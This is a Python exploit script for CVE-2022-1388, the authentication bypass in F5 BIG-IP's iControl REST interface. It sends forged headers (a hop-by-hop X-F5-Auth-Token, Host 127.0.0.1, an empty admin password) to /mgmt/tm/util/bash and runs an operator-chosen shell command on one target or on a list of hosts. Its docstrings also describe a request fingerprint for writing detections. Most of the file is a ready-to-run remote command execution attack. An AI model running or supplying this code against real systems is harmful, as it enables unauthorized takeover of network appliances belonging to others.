CVE-2022-1388.py
#!/usr/bin/env python3
import argparse, requests, urllib3
from termcolor import colored
import concurrent.futures
# Silence urllib3 warnings for the whole process. exploit() posts with
# verify=False, so every request would otherwise emit urllib3's
# unverified-HTTPS warning. The peer certificate is never checked, so the
# responding host's identity is not authenticated.
urllib3.disable_warnings()
def exploit(target, command):
    """Probe one host for CVE-2022-1388 and print the outcome.

    A single HTTPS POST is sent to ``/mgmt/tm/util/bash`` on ``target``
    (certificate verification off, 5 second timeout) carrying ``command``
    in the ``utilCmdArgs`` field. Nothing is returned; the result is
    printed to stdout.

    Request fingerprint, useful when writing detections or reviewing
    management-plane logs:
      * path ``/mgmt/tm/util/bash`` with a JSON body whose ``command``
        is ``run``
      * ``Connection`` header naming ``X-F5-Auth-Token``
      * ``X-F5-Auth-Token: 0`` and ``Host: 127.0.0.1``
      * ``Authorization: Basic YWRtaW46`` (base64 of ``admin:``, i.e. an
        empty password)

    Reading the output:
      * ``<target>\\t> <text>`` means the response was not 204, declared a
        JSON content type and contained a ``commandResult`` field.
      * "Target is not vulnerable" is printed for a 204 or a non-JSON
        response. The message does not name the target, so results from
        a list run cannot be attributed to a host from this line alone.
      * Anything else (timeout, TLS failure, missing ``content-type``
        header, JSON body without ``commandResult``) is caught by the
        broad ``except`` and printed as the bare exception text. A JSON
        error body therefore shows up as ``'commandResult'`` rather than
        as a clean negative, so this output is not a reliable "patched"
        signal.
    """
    try:
        endpoint = f'https://{target}/mgmt/tm/util/bash'
        request_headers = {
            'Host': '127.0.0.1',
            'Authorization': 'Basic YWRtaW46',
            'X-F5-Auth-Token': '0',
            # Declares X-F5-Auth-Token as a hop-by-hop header.
            'Connection': 'X-F5-Auth-Token',
            'Content-Type': 'application/json'
        }
        payload = {'command': 'run', 'utilCmdArgs': f'-c "{command}"'}
        response = requests.post(
            endpoint,
            headers=request_headers,
            json=payload,
            verify=False,
            timeout=5,
        )

        # Same short-circuit order as the original test: the content-type
        # header is only consulted when the status is not 204.
        if response.status_code == 204 or not response.headers['content-type'].strip().startswith('application/json'):
            print(colored('Target is not vulnerable', "yellow", attrs=['bold']))
            return

        command_output = response.json()['commandResult'].strip()
        print(target + '\t> ' + command_output)
    except Exception as err:
        # Every failure mode ends up here and is reported as plain text.
        print(colored(err, "yellow", attrs=['bold']))
if __name__ == "__main__":
    # Command-line entry point.
    #   -t/--target   one host[:port] to probe
    #   -l/--list     file with one host[:port] per line
    #   -c/--command  string forwarded to exploit(); defaults to 'id'
    # Both -t and -l default to the sentinel False, which is how
    # "option not given" is detected below.
    # NOTE(review): the -t help text shows port 80, but exploit() always
    # builds an https:// URL.
    cli = argparse.ArgumentParser()
    cli.add_argument('-t', '--target', default=False, help='The IP address of the target, eg: 127.0.0.1:80')
    cli.add_argument("-l", "--list", default=False, help="Target urls saperated with new line")
    cli.add_argument('-c', '--command', default='id', help='The command to execute, eg: id')
    opts = cli.parse_args()

    if opts.target is not False:
        # A single target wins over a list when both are supplied.
        exploit(opts.target, opts.command)
    elif opts.list is False:
        # Neither option given: show usage and stop.
        cli.print_help()
        cli.exit()
    else:
        # Hosts are processed one after another in file order. Only
        # trailing whitespace is stripped, so a blank line is passed on
        # as an empty target and surfaces as a printed request error.
        with open(opts.list) as handle:
            for line in handle:
                exploit(line.rstrip(), opts.command)